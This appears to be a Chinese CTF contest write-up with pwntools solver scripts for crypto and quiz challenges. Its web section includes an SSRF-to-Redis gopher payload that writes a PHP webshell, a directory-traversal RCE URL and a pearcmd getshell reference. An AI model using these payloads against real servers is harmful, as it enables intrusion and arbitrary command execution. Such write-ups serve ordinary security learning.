校内11月月赛 Write Up

发布于 18 天前  82 次阅读


我是废物

CRYPTO

where_is_n

没有模数,也就是已知c、e,求解明文

正常来说公式是m = pow(c, d, N)

在仅已知c、e的情况下,几乎不能反推出其他的参数,放弃

TakeFlagEasily

题目:

#!/usr/local/bin/python
from random import getrandbits

 
p = 2**607 - 1
a = getrandbits(607)
b = getrandbits(607)
print("a =", a)
print("b =", b)
 
try:
    seed = int(input("Give me your seed: "))
    res = int(input("Give me your result: "))
except:
    print("Get out!")
    exit(0)
 
r = getrandbits(22)
for _ in range(r):
    seed = (a * seed + b) % p
 
if seed == res:
    print("Take your flag:", open("flag.txt").read())
else:
    print("Sorry, not this way.")

LCG算法,但我哪会CRYPTO啊,只能是日常撞大运了

ctf之lcg算法_小健健健的博客-CSDN博客_lcg算法

不知道从哪抄来的解seed脚本(但是没用上):

#Xn=(a-1 (Xn+1 - b))%n


MMI = lambda A, n,s=1,t=0,N=0: (n < 2 and t%N or MMI(n, A%n, t, s-A//n*t, N or n),-1)[n<1] 
ani=MMI(a,n) 
for i in range(r):
    seed = (ani*(seed-b))%n

print(seed)

撞大运:

from hashlib import sha256
import random
from pwn import *
import string
for i in range(10000000):
	context.log_level = 'debug'
	p = remote("47.95.195.171", 8888)
	p.recvuntil(b'a = ')
	a = p.recvuntil(b'\n').strip().decode()
	p.recvuntil(b'b = ')
	b = p.recvuntil(b'\n').strip().decode()
	pp = 2**607 - 1
	seed = 1
	p.recvuntil(b'Give me your seed: ')
	p.sendline(str(seed))
	a = int(a)
	b = int(b)
	for _ in range(3):
	    seed = (a * seed + b) % pp
	p.recvuntil(b'Give me your result: ')
	p.sendline(str(seed))
	
	if p.recv(5) == b'Sorry':
		p.close() 
		continue
	else:
		break

MISC

所见即所思

所​​​​‏​‍​​​​‏‌‎​​​​‎‏‍​​​​‏​‎​​​​‏‏‎​​​​‎‏‎​​​​‍‌‌​​​​‎‏‍​​​​‌‏‏​​​​‍​‎​​​​‎‏‏​​​​‍​‌​​​​‌‏‎​​​​‍‌​​​​​‏​‍​​​​‏​‌​​​​‎‏‍​​​​‍‌‌​​​​‎‏‎​​​​‍​‍​​​​‎‏‍​​​​‍​​​​​​‍​‎​​​​‌‏‏​​​​‏​‌​​​​‍​‏​​​​‍​‏​​​​‏​​​​​​‎‏‎​​​​‍​‌​​​​‎‏‏​​​​‍‌‌​​​​‎‏‎​​​​‍​‎​​​​‏​​​​​​‍​‎​​​​‍‌‌​​​‌​​​思即所想

有一大堆的不可打印字符,大概看一下是U+200E和U+200F,推测零宽字符隐写

Offdev.net - Zero-width space steganography javascript demo (mzy0.com)

Realworld

你真的懂校纪吗1.0

让我想起来S3C的那道题了

大同小异

题目:

#!/usr/bin/python3.8
# -*- coding: UTF-8 -*-
import random, string, subprocess, os, sys
from signal import alarm
import hashlib


class myrandom:
    def __init__(self,seed,n,s):
        self.x = seed
        self.n = n
        self.s = s

    def next(self):
        x = int((self.x ** 2) // (10 ** (self.s // 2))) % self.n
        self.x = x
        high = (int(hashlib.sha256(str(x).encode()).hexdigest(),16) >> 16) & (2 ** 16 - 1)
        low = x & (2 ** 16 - 1)
        result = high << 16 | low
        return result % 7
    
def proof_of_work():
    random.seed(os.urandom(8))
    proof = ''.join([random.choice(string.ascii_letters+string.digits) for _ in range(20)])
    digest = hashlib.sha256(proof.encode()).hexdigest()
    print("sha256(XXXX+%s) == %s" % (proof[4:],digest))
    print("Give me XXXX:")
    x = input()
    if len(x) != 4 or hashlib.sha256((x + proof[4:]).encode()).hexdigest() != digest: 
        print("你怎么考上东秦的")
        exit()

def Check():
    alarm(60)
    proof_of_work()   
    alarm(100) 
    n = 10000000000
    s = 4
    seed = os.urandom(4)
    seed = int.from_bytes(seed,byteorder = "big")
    r = myrandom(seed,n,s)
    score = 0
    fanqiang = 0
    for i in range(100):
        try:
            fanqiang = r.next()
            print("翻墙次数:{}".format(fanqiang))
            if fanqiang >= 0 and fanqiang <= 1:
                status = input("处分类型:")
                score += (status == "警告")
            elif fanqiang >= 2 and fanqiang <= 3:
                status = input("处分类型:")
                score += (status == "严重警告")
            elif fanqiang >= 4 and fanqiang <= 5:
                status = input("处分类型:")
                score += (status == "记过")
            elif fanqiang >= 4 and fanqiang <= 5:
                status = input("处分类型:")
                score += (status == "留校察看")
            else:
                status = input("处分类型:")
                score += (status == "开除学籍")
            if score > 60:
                print("你是懂东秦校纪的")
                os.system("cat ./flag")
                break
        except:
            exit(0)

def main():
    print("+----------------------------+")
    print("|       你懂东秦校纪吗       |")
    print("|                            |")
    print("|     1. 你这算是问对人了    |")
    print("|     2. 别问,问就是退学    |")
    print("+----------------------------+")
    # cmd = raw_input(">> ")
    cmd = input(">> ")

    if cmd == '1':
        Check()
    else:
        print("好退")
	
if __name__ == "__main__":
    main()

脚本:

from hashlib import sha256
import random
from pwn import *
import string
context.log_level = 'debug'
dir = string.ascii_letters + string.digits
p = remote("47.95.195.171", 6666)
p.sendlineafter(b'+----------------------------+', '1')
p.recvuntil(b'sha256(XXXX+')
salt = p.recv(16).strip().decode()
p.recvuntil(b') == ')
hash = p.recv(64).strip().decode()
while True:
    rand_str = (''.join([random.choice(dir) for _ in range(4)])) + salt
    if sha256(rand_str.encode()).hexdigest() == hash:
        print("",rand_str[:4])
        p.sendlineafter(b'Give me XXXX:', rand_str[:4])
        break
for i in range(60):
    p.recvuntil('翻墙次数:'.encode("utf-8"))
    fanqiang = int(p.recv(1).strip().decode())
    if fanqiang >= 0 and fanqiang <= 1:
        p.sendline("警告".encode("utf-8"))
    elif fanqiang >= 2 and fanqiang <= 3:
        p.sendline("严重警告".encode("utf-8"))
    elif fanqiang >= 4 and fanqiang <= 5:
        p.sendline("记过".encode("utf-8"))
    elif fanqiang >= 4 and fanqiang <= 5:
        p.sendline("留校察看".encode("utf-8"))
    else:
        p.sendline("开除学籍".encode("utf-8"))
p.interactive()

flag{d6d80e8e1681b34328ee4c475b638ea0567a8e4a}

你真的懂校纪吗2.0

上面的check()改了一下,但是思路都一样

题目(部分):

def proof_of_work():
    chal = ''.join(random.choice(string.letters+string.digits) for _ in xrange(16))
    print('chal: '+chal)
    sol = input('sol: ')
    if len(sol) != 4 or not sha256(chal + sol).hexdigest().startswith('00000'):
        print('你怎么考上东秦的')
        exit()

小改一下:


from hashlib import sha256
import random
from pwn import *
import string

context.log_level = 'debug'
dir = string.ascii_letters + string.digits
p = remote("47.95.195.171", 7777)
p.sendlineafter(b'+----------------------------+', '1')
p.recvuntil(b'chal: ')
chal = p.recv(16).strip().decode()

while True:
    rand_str = (''.join([random.choice(dir) for _ in range(4)]))
    if hashlib.sha256((chal + rand_str).encode('utf-8')).hexdigest().startswith('00000'):
        print("",rand_str[:4])
        p.sendlineafter(b'sol: ', rand_str[:4])
        break
p.sendlineafter(b'Code: ', b'啥玩意啊')
p.interactive()

之后那个Code长度要小于1024,还给了vm的二进制文件,估计是PWN,就此结束(

完整题目:

#!/usr/bin/python3.8
# -*- coding: UTF-8 -*-
import random, string, subprocess, os, sys
from signal import alarm
import hashlib

def proof_of_work():
    chal = ''.join(random.choice(string.letters+string.digits) for _ in xrange(16))
    print('chal: '+chal)
    sol = input('sol: ')
    if len(sol) != 4 or not sha256(chal + sol).hexdigest().startswith('00000'):
        print('你怎么考上东秦的')
        exit()

def Check():
	alarm(60)
	proof_of_work()    
	alarm(100)
	code = input("Code: ")
	try:
		if len(code) > 0x400 :
			print("Error.")
			sys.exit(0)
	except Exception as e:
		print("Error.")
		sys.exit(0)

	score = 0
	new_score = 0
    fanqiang = 0
	while True:
		try:
            fanqiang =  random.randint(0,7)
			io = process("./vm")
			# context.log_level = 'debug'
			io.sendlineafter('input your opcode:\n', code)
            io.sendline(fanqiang)

			if fanqiang >= 0 and fanqiang <= 1:
				status = io.readline(timeout=8)[:-1]
                new_score += (status == "警告")
			elif fanqiang >= 2 and fanqiang <= 3:
				status = io.readline(timeout=8)[:-1]
                new_score += (status == "严重警告")
            elif fanqiang >= 4 and fanqiang <= 5:
				status = io.readline(timeout=8)[:-1]
                new_score += (status == "记过")
            elif fanqiang >= 4 and fanqiang <= 5:
				status = io.readline(timeout=8)[:-1]
                new_score += (status == "留校察看")
			else:
				status = io.readline(timeout=8)[:-1]
                new_score += (status == "开除学籍")

			io.close()
            if new_score == score:
                break

            score = new_score
			if score > 100:
                print("你是懂东秦校纪的")
				os.system("cat ./flag")
                break
			
		except Exception as e:
			io.close()
			break

def main():
    print("+----------------------------+")
    print("|       你懂东秦校纪吗       |")
    print("|                            |")
    print("|     1. 你这算是问对人了    |")
    print("|     2. 别问,问就是退学    |")
    print("+----------------------------+")
    # cmd = raw_input(">> ")
    cmd = input(">> ")

    if cmd == '1':
        Check()
    else:
        print("好退")
	
if __name__ == "__main__":
    main()


WEB

EzSSRF(baby)

题目:

<?php
highlight_file(__file__);
function curl($url){  
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    echo curl_exec($ch);
    curl_close($ch);
}

if(isset($_GET['url'])){
    $url = $_GET['url'];

    if(preg_match('/localhost|127.0.0.1|http\:\/\//is', $url,$match))
    {
        //你知道ssrf什么意思嘛,给你个`公网`的hint罢,快去hint.php康康
        die('Too young,Too simple!');
    }
    curl($url);
}
if(isset($_GET['info'])){
    phpinfo();
}
?>

SSRF,用file://协议读文件即可,但是flag到底放在哪里了呢?

EzRCE

需要分别绕过前缀和后缀

前面的"/var/www/html/"用../进行目录穿越,测试可行

124.222.182.202:30002/?rce=../../../../../../../../../../../../../var/www/html/index

伪协议行不通,跨站也不行,作罢。

WEB复现

Ezssrf

由phpinfo得到网段

Hostname:Port 172.19.0.3:80

扫扫扫:

这次我可把flag放到根目录了,让我康康是谁访问不到了呀?
但是好心的我留了个上传后门呢1

通过字典扫描可以发现/upload目录,redis利用

使用gopherus生成payload

修改ip和port,编码后传入

(关于这里郑佬踩的坑:

URL编码时没有编码全部字符,CaptfEncoder可以更换为编码全部字符)

81.70.101.23:8848/b1ub1u.php?url=gopher%3A%2F%2F172.19.0.2%3A6378%2F_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252432%250D%250A%250A%250A%253C%253Fphp%2520system%2528%2527cat%2520%2Fflag%2527%2529%253B%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252420%250D%250A%2Fvar%2Fwww%2Fhtml%2Fupload%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Amnhhh.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A%0A

81.70.101.23:8848/b1ub1u.php?url=172.19.0.2/upload/mnhhh.php

Ezssrf(baby)

扫扫扫:

81.70.101.23:8838/b1ub1u.php?url=172.31.0.2/f1ag.php

Ezrce

Easy?

https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp

蚁剑连上124.222.182.202:30002/?rce=./../../tmp/mnh